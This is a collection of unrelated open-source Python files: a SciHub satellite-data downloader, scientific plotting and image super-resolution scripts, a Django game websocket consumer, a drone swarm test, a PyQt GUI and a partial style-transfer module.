self.query_prods_res.get(\"feed\").get(\"opensearch:totalResults\") != \"0\":\n prods = self.query_prods_res.get(\"feed\").get(\"entry\")\n if isinstance(prods, dict):\n prods = [\n prods\n ] # If there's only one product, xmlparser returns a dict instead of a list of dicts\n for p in prods:\n self.grd_xml = (\n p if \"GRD\" in p.get(\"title\") else self.grd_xml\n ) # This is XML\n self.ocn_xml = (\n p if \"OCN\" in p.get(\"title\") else self.ocn_xml\n ) # This is XML\n\n if self.grd_xml:\n self.grd_id = self.grd_xml.get(\"title\")\n self.grd_shid = self.grd_xml.get(\"id\")\n self.is_vv = \"VV\" in xml_get(\n self.grd_xml.get(\"str\"), \"polarisationmode\"\n )\n\n if self.ocn_xml:\n self.ocn = Ocn_Ext(grd, self.ocn_xml)\n self.URLs[\n \"download_ocn\"\n ] = f\"https://{user}:{pwd}@scihub.copernicus.eu/dhus/odata/v1/Products('{self.ocn.uuid}')/%24value\"\n\n else:\n pass # There are no products listed! 
https://app.asana.com/0/1170930608885369/1171069537674895\n\n def __repr__(self):\n return f\"\"\n\n def download_ocn(self, ocn_path=None):\n \"\"\"Create a local directory, and download an OCN zip file to it\n \"\"\"\n if server_config.VERBOSE:\n print(\"Downloading OCN\")\n if not self.ocn_xml:\n raise MissingProductError(\n product_id=self.prod_id, message=\"ERROR: No OCN found for this GRD\"\n )\n\n self.ocn.file_path = (\n ocn_path or Path(path_config.LOCAL_DIR) / \"temp\" / self.ocn.pid / \"ocn.zip\"\n )\n self.ocn.file_path.parent.mkdir(parents=True, exist_ok=True)\n if not self.ocn.file_path.exists():\n with requests.Session() as s:\n try:\n p = s.get(self.URLs.get(\"download_ocn\"))\n except requests.exceptions.ConnectionError as e:\n print(\"Error connecting to SciHub\")\n raise e\n open(self.ocn.file_path, \"wb\").write(p.content)\n return self.ocn.file_path\n\n def cleanup(self, grd=True, ocn=True):\n \"\"\"Delete any local directory made to store the GRD and OCN\n \"\"\"\n if self.grd_path.parent.exists() and grd:\n shutil.rmtree(self.grd_path.parent)\n if self.ocn.file_path.parent.exists() and ocn:\n shutil.rmtree(self.ocn.file_path.parent)\n\n","repo_name":"jonaraphael/ceruleanserver","sub_path":"ceruleanserver/data_objects.py","file_name":"data_objects.py","file_ext":"py","file_size_in_byte":12089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"30925586824","text":"from data_processing.fitting import fit_data\nfrom settings.get_settings import join_strings, check_if_exists_or_write, SETTINGS\nimport re\nimport os\nimport numpy as np\nimport datetime\nfrom scipy.optimize import curve_fit\n# area for good figures and random figures\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport pyvims\n\nclass plotting_base:\n def __init__(self, devEnvironment: bool = True):\n if devEnvironment == True:\n self.save_dir = join_strings(\n SETTINGS[\"paths\"][\"parent_figures_path\"], SETTINGS[\"paths\"][\"dev_figures_sub_path\"])\n else:\n self.save_dir = join_strings(\n SETTINGS[\"paths\"][\"parent_figures_path\"], SETTINGS[\"paths\"][\"prod_figures_sub_path\"])\n self.filtered_data_dir = join_strings(\n SETTINGS[\"paths\"][\"parent_data_path\"], SETTINGS[\"paths\"][\"sorted_sub_path\"])\n self.fitted_data_dir = join_strings(\n SETTINGS[\"paths\"][\"parent_data_path\"], SETTINGS[\"paths\"][\"fitted_sub_path\"])\n self.devEnvironment = devEnvironment\n\n def get_fitted_data(self):\n all_data = {}\n if os.path.exists(join_strings(self.filtered_data_dir, SETTINGS[\"paths\"][\"cumulative_fitted_path\"])):\n all_data = check_if_exists_or_write(join_strings(\n self.fitted_data_dir, SETTINGS[\"paths\"][\"cumulative_fitted_path\"]), save=False, verbose=True)\n else:\n cubs = os.listdir(self.fitted_data_dir)\n cubs = [cub for cub in cubs if re.fullmatch(\n r'C.*_.*\\.pkl', cub) is not None]\n for cub in cubs:\n cube_name = os.path.splitext(cub)[0]\n all_data[cube_name] = check_if_exists_or_write(\n join_strings(self.fitted_data_dir, cub), save=False, verbose=True)\n return all_data\n\n def get_fig_path(self, figure_type: str, fig_name: str, cube_name: str):\n base_path = join_strings(self.save_dir, figure_type)\n figure_type = figure_type\n fig_name = fig_name\n cube_name = cube_name\n now = datetime.datetime.now()\n year = now.year\n month = now.month\n day = now.day\n hour = now.hour\n minute = now.minute\n second = now.second\n try:\n index = 1 + len(os.listdir(base_path))\n except:\n index = 1\n if self.devEnvironment == 
True:\n file_format = SETTINGS[\"paths\"][\"figure_path_format_dev\"]\n else:\n file_format = SETTINGS[\"paths\"][\"figure_path_format_dev\"]\n\n # Extract variable names from the file_format string\n placeholders = re.findall(r\"{(.*?)}\", file_format)\n # Create a dictionary to hold variable names and their values\n a = locals()\n file_formatted = '_'.join([str(a[placeholder]) for placeholder in placeholders])\n return join_strings(base_path, file_formatted)\n\n def filter_cubes(self, data, cubes : str):\n if cubes == \"all\":\n return data\n else:\n filtered_data = {}\n for cube in cubes:\n filtered_data[cube] = data[cube]\n return filtered_data\n \n def timeline_figure(self, band: int = None):\n all_fits = {}\n fig, axs = plt.subplots(4, 3, figsize=(12, 8))\n axs = axs.flatten()\n plt.title(str(band))\n data = self.get_fitted_data()\n quantity = len(data)\n cmap = matplotlib.colormaps.get_cmap('bone')\n for index, (cube, cube_fits) in enumerate(data.items()):\n key = [ke for ke in cube_fits.keys() if ke.split(\"_\")[1] == str(band)][0]\n wavelength_fit = cube_fits[key]\n length = len(wavelength_fit)\n for ind, (degree, slant) in enumerate(wavelength_fit.items()):\n axs[index].plot(slant[\"emission_angles\"], slant[\"brightness_values\"], label = str(degree), color= cmap(1.6*abs(ind/length - 0.5)))\n axs[index].set_xlim(0, 95)\n axs[index].set_ylim(bottom = 0)\n axs[index].legend(fontsize=3)\n axs[index].set_title(cube)\n fig.tight_layout()\n try:\n check_if_exists_or_write(self.get_fig_path(\"timeline\", str(band), \"all\") + \".png\", save=True, data=\"sdfs\", force_write=True, verbose=True)\n except:\n pass\n fig.savefig(self.get_fig_path(\"timeline\", str(band), \"all\") + \".png\", dpi=450)\n # plt.show()\n\n def look_at_fits(self, cube_index: int = None, band: int = None):\n data = self.get_fitted_data()\n data = dict(sorted(data.items()))\n cube = data[list(data.keys())[cube_index]]\n band = cube[list(cube.keys())[band]]\n fit_obj = fit_data(fit_type=\"quad\")\n for slant, slant_data in band.items():\n \n x = fit_obj.emission_to_normalized(np.linspace(np.min(slant_data[\"emission_angles\"]), np.max(slant_data[\"emission_angles\"]), 100))\n # fit_obj.I_0 = slant_data[\"fit\"][\"fit_params\"][\"I_0\"]\n \n y = [fit_obj.quadratic_limb_darkening(xs,slant_data[\"fit\"][\"fit_params\"][\"I_0\"], slant_data[\"fit\"][\"fit_params\"][\"u1\"], slant_data[\"fit\"][\"fit_params\"][\"u2\"]) for xs in x]\n plt.plot(x, y)\n plt.plot(fit_obj.emission_to_normalized(slant_data[\"emission_angles\"]), slant_data[\"brightness_values\"])\n plt.show()\n # for index, (cube, cube_fits) in enumerate(cube.items()):\n # key = [ke for ke in cube_fits.keys() if ke.split(\"_\")[1] == str(band)][0]\n # wavelength_fit = cube_fits[key]\n # length = len(wavelength_fit)\n # for ind, (degree, slant) in enumerate(wavelength_fit.items()):\n # plt.plot(slant[\"emission_angles\"], slant[\"brightness_values\"], label = str(degree))\n # plt.set_xlim(0, 95)\n # plt.set_ylim(bottom = 0)\n plt.legend(fontsize=6)\n # plt.title(\"\")\n def coeff_vs_deg(self, band: int = None):\n data = self.get_fitted_data()\n data = dict(sorted(data.items()))\n fig, axs = plt.subplots(4, 3, figsize=(12, 8))\n axs = axs.flatten()\n \n handles = [] # To store legend handles\n for index, (cube, cube_fits) in enumerate(data.items()):\n key = [ke for ke in cube_fits.keys() if ke.split(\"_\")[1] == str(band)][0]\n wavelength_fit = cube_fits[key]\n u_plus = []\n u_minus = []\n axs[index].set_title(cube)\n axs[index].minorticks_on()\n 
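# Every cube panel below gets the same tick spacing and axis limits, so the twelve subplots of the 4x3 grid are directly comparable.\n            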
axs[index].set_xticks(np.arange(0,361, 60))\n axs[index].set_yticks(np.arange(-2,3.1, 1, dtype=int))\n # axs[index].set_ylabel(\"N/\")\n axs[index].set_xlim(-20,380)\n axs[index].set_ylim(-1.5,3)\n for slant, slant_data in wavelength_fit.items():\n u1 = axs[index].scatter(slant, slant_data[\"fit\"][\"fit_params\"][\"u1\"], color=(0, 0, 0))\n u2 = axs[index].scatter(slant, slant_data[\"fit\"][\"fit_params\"][\"u2\"], color=(1, 0, 0))\n\n u_plus.append(slant_data[\"fit\"][\"fit_params\"][\"u1\"] + slant_data[\"fit\"][\"fit_params\"][\"u2\"])\n u_minus.append(slant_data[\"fit\"][\"fit_params\"][\"u1\"] - slant_data[\"fit\"][\"fit_params\"][\"u2\"])\n\n line_plus, = axs[index].plot(list(wavelength_fit.keys()), u_plus, color=(0, 1, 0))\n line_minus, = axs[index].plot(list(wavelength_fit.keys()), u_minus, color=(0, 0, 1))\n if index == 0:\n handles.append(u1) # Add scatter plot handle to the list \n handles.append(u2)\n handles.append(line_plus) # Add line plot handle to the list\n handles.append(line_minus) # Add line plot handle to the list\n elif index >= 9:\n axs[index].set_xlabel(\"Slant Angle (˚)\")\n # Don't add labels to individual lines, we'll add them to the global legend\n # axs[index].legend([line_plus, line_minus], )\n\n # Create a global legend outside the loop\n fig.legend(handles, [\"µ1\", \"µ2\",\"µ1 + µ2\", \"µ1 - µ2\"])\n fig.subplots_adjust(wspace=0.12, hspace=0.3, top=0.95, bottom=0.05, left=0.05, right=0.95)\n # Customize the markers in the legend\n # for legend_item in global_legend.legendHandles:\n # legend_item.set_markerfacecolor('black') # Set the marker face color\n # legend_item.set_markeredgecolor('black') # Set the marker edge color\n # legend_item.set_markersize(10) # Set the marker size\n \n plt.show()\n\n # for index, (cube, cube_fits) in enumerate(cube.items()):\n # key = [ke for ke in cube_fits.keys() if ke.split(\"_\")[1] == str(band)][0]\n # wavelength_fit = cube_fits[key]\n # length = len(wavelength_fit)\n # for ind, (degree, slant) in enumerate(wavelength_fit.items()):\n # plt.plot(slant[\"emission_angles\"], slant[\"brightness_values\"], label = str(degree))\n # plt.set_xlim(0, 95)\n # plt.set_ylim(bottom = 0)\n # plt.legend(fontsize=6)\n def select_good_and_bad_bands(self):\n fitted_data = self.get_fitted_data()\n cubes = {}\n rejected =[0]\n if os.path.exists(os.curdir + \"/rejected_bands.pkl\"):\n rejected = check_if_exists_or_write(os.curdir + \"/rejected_bands.pkl\", save=False, verbose=True)\n \n for cube in fitted_data.keys():\n cube_vis = pyvims.VIMS(cube + \"_vis.cub\", join_strings(SETTINGS[\"paths\"][\"parent_data_path\"], SETTINGS[\"paths\"][\"cube_sub_path\"],cube), channel=\"vis\")\n cube_ir = pyvims.VIMS(cube + \"_ir.cub\", join_strings(SETTINGS[\"paths\"][\"parent_data_path\"], SETTINGS[\"paths\"][\"cube_sub_path\"],cube), channel=\"ir\")\n cubes[cube] = {\"vis\": cube_vis, \"ir\": cube_ir}\n for band in range(1,353):\n if band < np.max(rejected):\n continue\n import matplotlib.pyplot as plt\n fig, axs = plt.subplots(4,3, figsize=(14,8))\n axs = axs.flatten()\n for index, (cube, data) in enumerate(cubes.items()):\n axs[index].set_title(cube)\n if band <= 96:\n axs[index].imshow(data[\"vis\"][band], cmap=\"gray\")\n else:\n axs[index].imshow(data[\"ir\"][band], cmap=\"gray\")\n plt.waitforbuttonpress(5)\n plt.close(\"all\")\n while True:\n inp = input(str(band) + \" Good? 
(y/n)\")\n if \"y\" in inp:\n break\n if \"n\" in inp:\n rejected.append(band)\n break\n \n check_if_exists_or_write(os.curdir + \"/rejected_bands.pkl\", save=True, data=rejected, force_write=True, verbose=True)\n return rejected\n\nx = plotting_base()\n# var = x.select_good_and_bad_bands()\n# print(var)\nfor i in range(12):\n x.look_at_fits(cube_index=i,band=118)\n\n\n#index 1, North is straight right\n# figure_waves = np.linspace(1, 352, 4)\n# for wave in figure_waves:\n# print(wave)\n# x.timeline_figure(band=int(wave))\n# # print(x.get_fig_path(\"test\", \"test\", \"test\"))\n\n\n","repo_name":"AadvikVashist/Titan_Limb_Fitting","sub_path":"fitting_code/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":11136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"73102424862","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 7 10:07:14 2017\n\n@author: ldy\n\"\"\"\n\nfrom __future__ import print_function\nfrom os.path import exists, join, basename\nfrom os import makedirs, remove\nimport argparse\nimport torch\nfrom torch.autograd import Variable\nfrom PIL import Image\nfrom torchvision.transforms import ToTensor\nfrom glob import glob\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom pylab import rcParams\nrcParams['figure.figsize'] = 40, 24\nrcParams.update({'font.size': 22})\n# Training settings\nparser = argparse.ArgumentParser(description='PyTorch LapSRN')\nparser.add_argument('--test_folder', type=str, default='./dataset/BSDS300/images/train', help='input image to use')\nparser.add_argument('--model', type=str, default='model/model_epoch_50.pth', help='model file to use')\nparser.add_argument('--save_folfer', type=str, default='./results', help='input image to use')\nparser.add_argument('--output_filename', type=str, help='where to save the output image')\nparser.add_argument('--cuda', action='store_true', help='use cuda')\n\nopt = parser.parse_args()\n\nprint(opt)\n\ndef centeredCrop(img):\n width, height = img.size # Get dimensions\n new_width = width - width % 8\n new_height = height - height % 8 \n left = (width - new_width)/2\n top = (height - new_height)/2\n right = (width + new_width)/2\n bottom = (height + new_height)/2\n return img.crop((left, top, right, bottom))\n\ndef process(out, cb, cr):\n out_img_y = out.data[0].numpy()\n out_img_y *= 255.0\n out_img_y = out_img_y.clip(0, 255)\n out_img_y = Image.fromarray(np.uint8(out_img_y[0]), mode='L')\n \n out_img_cb = cb.resize(out_img_y.size, Image.BICUBIC)\n out_img_cr = cr.resize(out_img_y.size, Image.BICUBIC)\n out_img = Image.merge('YCbCr', [out_img_y, out_img_cb, out_img_cr]).convert('RGB')\n return out_img\n\ndef save_image(HR_2, HR_4, HR_8, GT, name):\n LR = GT.resize((y.size[0]/8, y.size[1]/8), Image.BICUBIC)\n Bicubic_HR_2 = LR.resize((y.size[0]*2, y.size[1]*2), Image.BICUBIC)\n Bicubic_HR_4 = LR.resize((y.size[0]*4, y.size[1]*4), Image.BICUBIC)\n Bicubic_HR_8 = LR.resize((y.size[0]*8, y.size[1]*8), Image.BICUBIC)\n\n fig = plt.figure()\n \n ax = plt.subplot(\"251\")\n ax.axis(\"off\")\n ax.imshow(LR)\n ax.set_title(\"LR\")\n \n ax = plt.subplot(\"252\")\n ax.axis(\"off\")\n ax.imshow(HR_2)\n ax.set_title(\"LapSAN HR_2\")\n \n ax = plt.subplot(\"253\")\n ax.axis(\"off\")\n ax.imshow(HR_4)\n ax.set_title(\"LapSAN HR_4\")\n \n ax = plt.subplot(\"254\")\n ax.axis(\"off\")\n ax.imshow(HR_8)\n ax.set_title(\"LapSAN HR_8\")\n \n ax = plt.subplot(\"255\")\n ax.axis(\"off\")\n ax.imshow(GT)\n 
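# The fifth panel of the top row shows the ground truth for side-by-side comparison with the LapSRN outputs; the bottom row repeats the LR input alongside the bicubic baselines.\n    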
ax.set_title(\"GT\")\n\n ax = plt.subplot(\"256\")\n ax.axis(\"off\")\n ax.imshow(LR)\n ax.set_title(\"LR\")\n \n ax = plt.subplot(\"257\")\n ax.axis(\"off\")\n ax.imshow(Bicubic_HR_2)\n ax.set_title(\"Bicubic HR_2\")\n \n ax = plt.subplot(\"258\")\n ax.axis(\"off\")\n ax.imshow(Bicubic_HR_4)\n ax.set_title(\"Bicubic HR_4\")\n \n ax = plt.subplot(\"259\")\n ax.axis(\"off\")\n ax.imshow(Bicubic_HR_8)\n ax.set_title(\"Bicubic HR_8\")\n \n ax = plt.subplot(2,5,10)\n ax.axis(\"off\")\n ax.imshow(GT)\n ax.set_title(\"GT\")\n if not exists(opt.save_folfer):\n makedirs(opt.save_folfer)\n fig.savefig(opt.save_folfer+'/'+name+'.png')\n print ('image:'+name+'saved!')\n \n\n \nimages_list = glob(opt.test_folder+'/*.jpg')\nprint (len(images_list))\nmodel = torch.load(opt.model)\nif opt.cuda:\n model = model.cuda()\nfor image_path in images_list:\n img_name = image_path.split('/')[-1].split('.')[0]\n img = Image.open(image_path).convert('YCbCr')\n img = centeredCrop(img)\n y, cb, cr = img.split()\n LR = y.resize((y.size[0]/8, y.size[1]/8), Image.BICUBIC)\n print (LR.size)\n LR = Variable(ToTensor()(LR)).view(1, -1, LR.size[1], LR.size[0])\n if opt.cuda:\n LR = LR.cuda()\n HR_2, HR_4, HR_8 = model(LR)\n HR_2 = HR_2.cpu()\n HR_4 = HR_4.cpu()\n HR_8 = HR_8.cpu()\n HR_2 = process(HR_2, cb, cr)\n HR_4 = process(HR_4, cb, cr)\n HR_8 = process(HR_8, cb, cr)\n img = img.convert(\"RGB\")\n save_image(HR_2, HR_4, HR_8, img, img_name)\n \n\n","repo_name":"BUPTLdy/Pytorch-LapSRN","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4197,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"7"} +{"seq_id":"43038920443","text":"from asgiref.sync import async_to_sync\nfrom channels.generic.websocket import WebsocketConsumer\nfrom channels_presence.models import Room, Presence\n\nfrom django.db.models import Q\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom accounts.models import CustomUser, Notification\nfrom game.models import Match\nfrom chat.serializers import messageSenderSerializer\nimport json\nimport string \nimport random\nimport logging\n\ndb_logger = logging.getLogger('db')\n\nclass GameConsumer(WebsocketConsumer):\n\n def connect(self):\n self.room_name = self.scope['url_route']['kwargs']['room']\n self.room_group_name = 'game_' + self.room_name\n self.accept()\n\n if self.room_name == 'create':\n all = string.digits + string.ascii_letters\n name = random.choices(all, k=6)\n self.room_name = \"\".join(name)\n self.room_group_name = 'game_' + self.room_name\n self.send(json.dumps({\n 'type':'created',\n 'room':self.room_name,\n }))\n\n connected_count = 0\n elif self.room_name == 'random':\n counter = 1\n while self.room_name == 'random':\n try:\n room:Room = Room.objects.get(channel_name=f'random_{counter}')\n except ObjectDoesNotExist as e:\n room = Room.objects.create(channel_name=f'random_{counter}')\n connected_count = room.presence_set.count()\n if connected_count < 2:\n self.room_name = f'random_{counter}'\n self.room_group_name = f'random_{counter}'\n if connected_count == 0:\n self.send(json.dumps({\n 'type':'created',\n 'room':self.room_name,\n }))\n counter += 1\n \n elif self.room_name == 'invite':\n try:\n invited = self.scope['url_route']['kwargs']['invited']\n invited = CustomUser.objects.get(front_id=invited)\n except Exception as e:\n print(e)\n self.send(json.dumps({\n 'type':'error',\n 'code':'404',\n 'error':'Can\\'t find the user'\n }))\n self.close()\n else:\n all = string.digits + string.ascii_letters\n 
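# Unlike the 6-character codes used for public rooms above, invite rooms get a 16-character code, so a private room is much harder to guess. (Note: 'all' shadows the Python builtin of the same name.)\n                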
name = random.choices(all, k=16)\n self.room_name = \"\".join(name)\n self.room_group_name = 'game_' + self.room_name\n Notification.objects.create(user=invited, room=self.room_name)\n self.send(json.dumps({\n 'type':'invited',\n 'friend':invited.name,\n }))\n \n\n connected_count = 0\n else:\n try:\n connected_count = Room.objects.get(channel_name=self.room_group_name).presence_set.count()\n except:\n self.send(json.dumps({\n 'type':'error',\n 'code':'404',\n 'error': 'this room doesn\\'t exist please make sure you typed the code right'\n }))\n self.close()\n return\n else:\n if connected_count > 1:\n self.send(text_data=json.dumps({\n 'type':'error',\n 'code':'420',\n 'error': 'this room is already full try to connect to different room'\n }))\n self.close()\n return\n \n async_to_sync(self.channel_layer.group_add)(\n self.room_group_name,\n self.channel_name\n )\n Room.objects.add(self.room_group_name, self.channel_name, self.scope['user'])\n\n if connected_count == 1:\n async_to_sync(self.channel_layer.group_send)(\n self.room_group_name,\n {\n 'type':'room_completed',\n }\n )\n \n\n \n def disconnect(self, close_code):\n # Leave room group\n try:\n player = Room.objects.get(channel_name=self.room_group_name).presence_set.filter(channel_name=self.channel_name)\n if player.exists():\n user = player.first().user \n async_to_sync(self.channel_layer.group_send)(\n self.room_group_name,\n {\n 'type':'error',\n 'code':'430',\n 'error':'user left the room. waiting for another user to join'\n }\n )\n async_to_sync(self.channel_layer.group_discard)(\n self.room_group_name,\n self.channel_name\n )\n Room.objects.remove(self.room_group_name, self.channel_name)\n except Exception as e:\n print('error occured')\n print(e)\n Room.objects.prune_presences()\n Room.objects.prune_rooms()\n \n \n def receive(self, text_data):\n player = Room.objects.get(channel_name=self.room_group_name).presence_set.filter(channel_name=self.channel_name)\n if not player.exists():\n self.send(json.dumps({\n 'type':'error',\n 'code':'408',\n 'error':'Time out! 
You have to play in 15 seconds'\n }))\n self.close()\n return\n\n text_data = json.loads(text_data)\n if text_data['type'] == 'completed':\n \n user:CustomUser = self.scope['user']\n match = Match()\n if user.is_authenticated:\n user = CustomUser.objects.get(id=user.id)\n user.lost_games += 1\n match.loser = user\n user.save()\n\n competitor:CustomUser = Room.objects.get(channel_name=self.room_group_name).presence_set.filter(~Q(channel_name=self.channel_name)).first().user\n if competitor:\n competitor.won_games += 1\n match.winner = competitor\n competitor.save()\n if match.loser or match.winner:\n match.save()\n return \n elif text_data['type'] == 'draw':\n competitor:CustomUser = Room.objects.get(channel_name=self.room_group_name).presence_set.filter(~Q(channel_name=self.channel_name)).first().user\n match = Match.objects.create()\n \n if competitor:\n competitor.draw_games += 1\n competitor.matches.add(match)\n competitor.save()\n user = self.scope['user']\n if user.is_authenticated:\n user = CustomUser.objects.get(id=user.id)\n user.draw_games += 1\n user.matches.add(match)\n user.save() \n if not match.draw.all():\n match.delete()\n return\n\n\n async_to_sync(self.channel_layer.group_send)(\n self.room_group_name,\n text_data\n )\n Presence.objects.touch(self.channel_name)\n\n \n def game_play(self, event):\n self.send(text_data=json.dumps(event))\n \n\n def error(self, event):\n self.send(json.dumps(event))\n\n def room_completed(self, event):\n user = self.scope['user']\n self_channel = Presence.objects.get(channel_name=self.channel_name)\n\n competitor = Room.objects.get(channel_name=self.room_group_name).presence_set.filter(~Q(channel_name=self_channel)).first().user\n if user.is_authenticated:\n serializer = messageSenderSerializer(instance=user)\n event.update({\n 'self': serializer.data\n })\n else:\n try:\n event.update({\n 'self': {\n 'front_id':None,\n 'image':CustomUser().image.url,\n 'name':'Unknown User',\n 'profile_url':\"#\"\n }\n })\n except Exception as e:\n print('cannot complete room')\n print(e)\n\n if competitor:\n serializer = messageSenderSerializer(instance=competitor)\n event.update({\n 'competitor': serializer.data\n })\n else:\n try:\n event.update({\n 'competitor': {\n 'front_id':None,\n 'image':CustomUser().image.url,\n 'name':'Unknown User',\n 'profile_url':\"#\"\n }\n })\n except Exception as e:\n print('cannot complete room')\n print(e)\n\n self.send(json.dumps(event))\n \n def restart(self, event):\n self.send(json.dumps(event))\n\n","repo_name":"ahmedyasserays/XO-online","sub_path":"game/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":9016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"1970738812","text":"from djitellopy import TelloSwarm\n\nswarm = TelloSwarm.fromIps([\n \"192.168.137.225\",\n \"192.168.137.5\"\n])\n\nswarm.connect()\n# swarm.takeoff()\nfor tello in swarm:\n print(tello.get_battery())\n\nswarm.move_up(100)\n\nswarm.sequential(lambda i, tello: tello.move_forward(20))\n\nswarm.parallel(lambda i, tello: tello.move_left(100))\n\nswarm.land()\nswarm.end()\n","repo_name":"despire907/TelloDroneStage","sub_path":"test/SwarmTest.py","file_name":"SwarmTest.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"38574865534","text":"import pickle\nimport pandas as pd\nimport sqlite3\nfrom sklearn.preprocessing import StandardScaler\n\n\n# Load the trained 
model\nwith open('best_nn_model.pkl', 'rb') as f:\n model = pickle.load(f)\n\n# Load the samples to classify\nsamples = pd.read_csv('data/df_test.csv')\n\n\n# Scale the input variables\nscaler = StandardScaler()\nsamples_scaled = scaler.fit_transform(samples)\n\n# Make predictions\npredictions = model.predict(samples_scaled)\n\n# Store the results in a SQLite database table\nconn = sqlite3.connect('data/predictions_test.db')\nc = conn.cursor()\n\n# Create the table if it doesn't exist\nc.execute('''CREATE TABLE IF NOT EXISTS predictions (id INTEGER PRIMARY KEY, class TEXT)''')\n\n# Insert the predictions into the table\nfor i, pred in enumerate(predictions):\n c.execute(\"INSERT INTO predictions (id, class) VALUES (?, ?)\", (i, pred))\n\n# Commit the changes and close the connection\nconn.commit()\nconn.close()\n\nconn = sqlite3.connect('data/predictions_test.db')\ndf = pd.read_sql_query(\"SELECT * FROM predictions\", conn)\nconn.close()\n\nprint(df)","repo_name":"rubentak/weather_prediction_classification","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71447711903","text":"#--------------------------------------------------------------------------\n# File and Version Information:\n# $Id$\n#\n# Description:\n# GUIROIMask...\n#------------------------------------------------------------------------\n\n\"\"\"GUI for CalibManager.\n\nThis software was developed for the SIT project. If you use all or \npart of it, please give an appropriate acknowledgment.\n\n@version $Id$\n\n@author Mikhail S. Dubrovin\n\"\"\"\nfrom __future__ import absolute_import\n\n#--------------------------------\n__version__ = \"$Revision$\"\n#--------------------------------\n\nimport os\nimport numpy as np\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\n#-----------------------------\n# Imports for other modules --\n#-----------------------------\n\n#from CalibManager.Frame import Frame\nfrom CalibManager.Logger import logger\nfrom .GUIMaskEditor import *\n\n#------------------------------\n#class GUIROIMask(Frame) : \nclass GUIROIMask(QtWidgets.QWidget) :\n \"\"\"QWidger wrapping ROI mask processing.\n \"\"\"\n\n def __init__(self, parent=None, app=None) :\n\n self.name = 'GUIROIMask'\n QtWidgets.QWidget.__init__(self, parent)\n #Frame.__init__(self, parent, mlw=1)\n\n self.setGeometry(10, 25, 800, 300)\n self.setWindowTitle('ROI Mask')\n\n self.win = GUIMaskEditor(self)\n #self.lab_status = QtGui.QLabel('Status: ')\n\n self.vbox = QtWidgets.QVBoxLayout() \n self.vbox.addWidget(self.win)\n self.vbox.addStretch(1)\n #self.vbox.addWidget(self.lab_status)\n\n self.hbox = QtWidgets.QHBoxLayout() \n self.hbox.addStretch(1)\n self.hbox.addLayout(self.vbox)\n self.hbox.addStretch(1)\n\n self.setLayout(self.hbox)\n \n self.showToolTips()\n self.setStyle()\n\n #self.setStatus(0)\n cp.guiroimask = self\n self.move(10,25)\n \n #print 'End of init'\n \n\n def showToolTips(self):\n pass\n #self.setToolTip('ROI mask wrapping widget') \n\n\n def setStyle(self):\n self.setMinimumSize(800,300)\n #self.setMaximumWidth(800)\n\n\n# def resizeEvent(self, e):\n# pass\n\n\n# def moveEvent(self, e):\n# pass\n\n\n def closeEvent(self, event):\n logger.debug('closeEvent', self.name)\n\n try : cp.maskeditor.close()\n except : pass\n\n cp.guiroimask = None\n\n\n# def onExit(self):\n# logger.debug('onExit', self.name)\n# self.close()\n\n\n# def setStatus(self, status_index=0, msg='Waiting for the 
next command'):\n# list_of_states = ['Good','Warning','Alarm']\n# if status_index == 0 : self.lab_status.setStyleSheet(cp.styleStatusGood)\n# if status_index == 1 : self.lab_status.setStyleSheet(cp.styleStatusWarning)\n# if status_index == 2 : self.lab_status.setStyleSheet(cp.styleStatusAlarm)\n# #self.lab_status.setText('Status: ' + list_of_states[status_index] + msg)\n# self.lab_status.setText(msg)\n\n#------------------------------\n\nif __name__ == \"__main__\" :\n import sys\n app = QtWidgets.QApplication(sys.argv)\n ex = GUIROIMask()\n ex.show()\n app.exec_()\n\n#------------------------------\n","repo_name":"lcls-psana/CalibManager","sub_path":"src/GUIROIMask.py","file_name":"GUIROIMask.py","file_ext":"py","file_size_in_byte":3144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"40021353712","text":"from __future__ import print_function\nimport torch.nn as nn\nimport torchvision.models as models\nimport numpy as np\nfrom mylibs import ContentLoss, StyleLoss, TVLoss, ContentFidelity\n\ndef GC(x,s):\n # GE\n GC = 0\n for i in range(3):\n hist_x = np.histogram(x[:,:,i], bins = 20)[0]\n hist_s = np.histogram(s[:,:,i], bins = 20)[0]\n GC += hist_x*hist_s/(np.linalg.norm(hist_x)*np.linalg.norm(hist_s)) \n GC /= 3\n return np.sum(GC)\n\nclass CNNMRF(nn.Module):\n def __init__(self, style_image, content_image, model, device, content_weight, style_weight, tv_weight, gpu_chunck_size=256, mrf_style_stride=2,\n mrf_synthesis_stride=2):\n super(CNNMRF, self).__init__()\n # fine tune alpha_content to interpolate between the content and the style\n self.content_weight = content_weight\n self.style_weight = style_weight\n self.tv_weight = tv_weight\n self.patch_size = 3\n self.device = device\n self.gpu_chunck_size = gpu_chunck_size\n self.mrf_style_stride = mrf_style_stride\n self.mrf_synthesis_stride = mrf_synthesis_stride\n # self.style_layers = [7,11] # # vgg19 [11,20], resnet_teacher_note [5, slice(None, 3)], resnet_style [11,13]\n # self.style_layers_resnet = [1,5]\n # self.content_layers = [15] # # vgg19 [22], resnet content [19]\n # self.content_layers_resnet = [2]\n if model == 'vgg':\n self.style_layers = [11,20] # vgg19 [11,20] resnet_teacher_note [5, slice(None, 3)]\n self.content_layers = [22] # vgg19 [22]\n self.model, self.content_losses, self.style_losses, self.tv_loss = \\\n self.get_model_and_losses(style_image=style_image, content_image=content_image)\n \n elif model == 'resnet':\n self.style_layers = [7,11]\n self.content_layers = [15]\n 